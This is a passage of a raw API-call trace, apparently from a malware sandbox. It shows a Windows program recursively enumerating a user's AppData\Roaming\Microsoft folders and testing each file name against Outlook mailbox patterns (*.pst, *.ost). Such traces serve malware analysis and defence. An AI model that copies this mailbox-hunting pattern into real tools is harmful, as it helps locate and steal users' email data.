dwMilliseconds=0x0) returned 0x102 [0251.254] PathMatchSpecW (pszFile="Preferred", pszSpec="*.pst") returned 0 [0251.254] PathMatchSpecW (pszFile="Preferred", pszSpec="*.ost") returned 0 [0251.254] FindNextFileW (in: hFindFile=0x5c0f970, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0 [0251.254] FindClose (in: hFindFile=0x5c0f970 | out: hFindFile=0x5c0f970) returned 1 [0251.254] FindNextFileW (in: hFindFile=0x5c0ee90, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0251.254] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.254] PathMatchSpecW (pszFile="SYNCHIST", pszSpec="*.pst") returned 0 [0251.254] PathMatchSpecW (pszFile="SYNCHIST", pszSpec="*.ost") returned 0 [0251.254] FindNextFileW (in: hFindFile=0x5c0ee90, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0 [0251.254] FindClose (in: hFindFile=0x5c0ee90 | out: hFindFile=0x5c0ee90) returned 1 [0251.254] FindNextFileW (in: hFindFile=0x44044f0, lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 1 [0251.254] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.254] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft", pszFile="Publisher" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher" [0251.254] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\*" [0251.254] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher\\*", lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0x5c0f2b0 [0251.255] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.255] FindNextFileW (in: hFindFile=0x5c0f2b0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0251.255] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.255] FindNextFileW (in: hFindFile=0x5c0f2b0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0 [0251.255] FindClose (in: hFindFile=0x5c0f2b0 | out: hFindFile=0x5c0f2b0) returned 1 [0251.255] FindNextFileW (in: hFindFile=0x44044f0, lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 1 [0251.255] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.255] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft", pszFile="Publisher Building Blocks" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks" [0251.255] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\*" [0251.255] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\*", lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0x5c0f970 [0251.255] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.255] FindNextFileW (in: hFindFile=0x5c0f970, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0251.255] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.255] FindNextFileW (in: hFindFile=0x5c0f970, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0251.255] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.255] PathMatchSpecW (pszFile="ContentStore.xml", pszSpec="*.pst") returned 0 [0251.255] PathMatchSpecW (pszFile="ContentStore.xml", pszSpec="*.ost") returned 0 [0251.255] FindNextFileW (in: hFindFile=0x5c0f970, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0 [0251.255] FindClose (in: hFindFile=0x5c0f970 | out: hFindFile=0x5c0f970) returned 1 [0251.255] FindNextFileW (in: hFindFile=0x44044f0, lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 1 [0251.255] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.255] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft", pszFile="Speech" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech" [0251.256] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\*" [0251.256] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\*", lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0x5c0ee90 [0251.256] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.256] FindNextFileW (in: hFindFile=0x5c0ee90, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0251.256] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.256] FindNextFileW (in: hFindFile=0x5c0ee90, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0 [0251.256] FindClose (in: hFindFile=0x5c0ee90 | out: hFindFile=0x5c0ee90) returned 1 [0251.256] FindNextFileW (in: hFindFile=0x44044f0, lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 1 [0251.256] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.256] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft", pszFile="SystemCertificates" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates" [0251.256] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*" [0251.256] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*", lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0x5c0ee90 [0251.256] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.256] FindNextFileW (in: hFindFile=0x5c0ee90, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0251.256] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.256] FindNextFileW (in: hFindFile=0x5c0ee90, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0251.256] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.256] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates", pszFile="My" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My" [0251.256] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*" [0251.256] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*", lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0x5c0efb0 [0251.257] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.257] FindNextFileW (in: hFindFile=0x5c0efb0, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0251.257] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.257] FindNextFileW (in: hFindFile=0x5c0efb0, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0251.257] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.257] PathMatchSpecW (pszFile="AppContainerUserCertRead", pszSpec="*.pst") returned 0 [0251.257] PathMatchSpecW (pszFile="AppContainerUserCertRead", pszSpec="*.ost") returned 0 [0251.257] FindNextFileW (in: hFindFile=0x5c0efb0, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0251.257] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.257] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", pszFile="Certificates" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates" [0251.257] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*" [0251.257] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*", lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 0x5c0f970 [0251.257] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.257] FindNextFileW (in: hFindFile=0x5c0f970, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 1 [0251.257] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.257] FindNextFileW (in: hFindFile=0x5c0f970, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 0 [0251.257] FindClose (in: hFindFile=0x5c0f970 | out: hFindFile=0x5c0f970) returned 1 [0251.258] FindNextFileW (in: hFindFile=0x5c0efb0, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0251.258] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.258] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", pszFile="CRLs" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs" [0251.258] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*" [0251.258] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*", lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 0x5c0f2b0 [0251.258] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.258] FindNextFileW (in: hFindFile=0x5c0f2b0, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 1 [0251.258] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.258] FindNextFileW (in: hFindFile=0x5c0f2b0, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 0 [0251.258] FindClose (in: hFindFile=0x5c0f2b0 | out: hFindFile=0x5c0f2b0) returned 1 [0251.258] FindNextFileW (in: hFindFile=0x5c0efb0, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0251.258] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.258] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", pszFile="CTLs" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs" [0251.259] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*" [0251.259] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*", lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 0x5c0f2b0 [0251.259] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.259] FindNextFileW (in: hFindFile=0x5c0f2b0, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 1 [0251.259] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.259] FindNextFileW (in: hFindFile=0x5c0f2b0, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 0 [0251.259] FindClose (in: hFindFile=0x5c0f2b0 | out: hFindFile=0x5c0f2b0) returned 1 [0251.259] FindNextFileW (in: hFindFile=0x5c0efb0, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0 [0251.259] FindClose (in: hFindFile=0x5c0efb0 | out: hFindFile=0x5c0efb0) returned 1 [0251.259] FindNextFileW (in: hFindFile=0x5c0ee90, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0 [0251.259] FindClose (in: hFindFile=0x5c0ee90 | out: hFindFile=0x5c0ee90) returned 1 [0251.259] FindNextFileW (in: hFindFile=0x44044f0, lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 1 [0251.259] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.259] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft", pszFile="Templates" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates" [0251.259] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\*" [0251.259] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\*", lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0x5c0fbb0 [0251.281] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.281] FindNextFileW (in: hFindFile=0x5c0fbb0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0251.281] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.281] FindNextFileW (in: hFindFile=0x5c0fbb0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0251.281] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.281] PathMatchSpecW (pszFile="Calendar insights.xltm", pszSpec="*.pst") returned 0 [0251.281] PathMatchSpecW (pszFile="Calendar insights.xltm", pszSpec="*.ost") returned 0 [0251.281] FindNextFileW (in: hFindFile=0x5c0fbb0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0251.281] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.281] PathMatchSpecW (pszFile="Cashflow analysis.xltm", pszSpec="*.pst") returned 0 [0251.281] PathMatchSpecW (pszFile="Cashflow analysis.xltm", pszSpec="*.ost") returned 0 [0251.281] FindNextFileW (in: hFindFile=0x5c0fbb0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0251.281] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.281] PathMatchSpecW (pszFile="Email Insights.xltm", pszSpec="*.pst") returned 0 [0251.281] PathMatchSpecW (pszFile="Email Insights.xltm", pszSpec="*.ost") returned 0 [0251.281] FindNextFileW (in: hFindFile=0x5c0fbb0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0251.281] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.281] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates", pszFile="LiveContent" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent" [0251.281] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\*" [0251.281] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\*", lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0x5c0ee90 [0251.282] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.282] FindNextFileW (in: hFindFile=0x5c0ee90, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0251.282] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.282] FindNextFileW (in: hFindFile=0x5c0ee90, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0251.283] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.283] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent", pszFile="16" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16" [0251.283] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\*" [0251.283] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\*", lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 0x5c0efb0 [0251.283] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.283] FindNextFileW (in: hFindFile=0x5c0efb0, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 1 [0251.283] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.283] FindNextFileW (in: hFindFile=0x5c0efb0, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 1 [0251.283] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.283] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16", pszFile="Managed" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed" [0251.283] PathCombineW (in: pszDest=0x235d9b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\*" [0251.283] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\*", lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 0x5c0f2b0 [0251.284] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.284] FindNextFileW (in: hFindFile=0x5c0f2b0, lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 1 [0251.284] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.284] FindNextFileW (in: hFindFile=0x5c0f2b0, lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 1 [0251.284] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.284] PathCombineW (in: pszDest=0x235d9b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed", pszFile="Document Themes" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes" [0251.284] PathCombineW (in: pszDest=0x235d4d0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\*" [0251.284] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\*", lpFindFileData=0x235d280 | out: lpFindFileData=0x235d280) returned 0x5c0f310 [0251.284] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.284] FindNextFileW (in: hFindFile=0x5c0f310, lpFindFileData=0x235d280 | out: lpFindFileData=0x235d280) returned 1 [0251.284] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.284] FindNextFileW (in: hFindFile=0x5c0f310, lpFindFileData=0x235d280 | out: lpFindFileData=0x235d280) returned 1 [0251.284] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.285] PathCombineW (in: pszDest=0x235d4d0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes", pszFile="1033" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033" [0251.285] PathCombineW (in: pszDest=0x235cff0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\*" [0251.285] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\*", lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 0x5c10990 [0251.310] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.310] FindNextFileW (in: hFindFile=0x5c10990, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 1 [0251.312] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.312] FindNextFileW (in: hFindFile=0x5c10990, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 1 [0251.312] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.312] PathMatchSpecW (pszFile="TM03090430[[fn=Banded]].thmx", pszSpec="*.pst") returned 0 [0251.312] PathMatchSpecW (pszFile="TM03090430[[fn=Banded]].thmx", pszSpec="*.ost") returned 0 [0251.312] FindNextFileW (in: hFindFile=0x5c10990, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 1 [0251.312] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.312] PathMatchSpecW (pszFile="TM03090434[[fn=Wood Type]].thmx", pszSpec="*.pst") returned 0 [0251.312] PathMatchSpecW (pszFile="TM03090434[[fn=Wood Type]].thmx", pszSpec="*.ost") returned 0 [0251.312] FindNextFileW (in: hFindFile=0x5c10990, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 1 [0251.312] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.312] PathMatchSpecW (pszFile="TM03457444[[fn=Basis]].thmx", pszSpec="*.pst") returned 0 [0251.312] PathMatchSpecW (pszFile="TM03457444[[fn=Basis]].thmx", pszSpec="*.ost") returned 0 [0251.312] FindNextFileW (in: hFindFile=0x5c10990, lpFindFileData=0x235cda0 | out: lpFindFileData=0x235cda0) returned 1 [0251.312] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.312] PathMatchSpecW (pszFile="TM03457464[[fn=Dividend]].thmx", pszSpec="*.pst") returned 0 [0251.312] PathMatchSpecW (pszFile="TM03457464[[fn=Dividend]].thmx", pszSpec="*.ost") returned 0 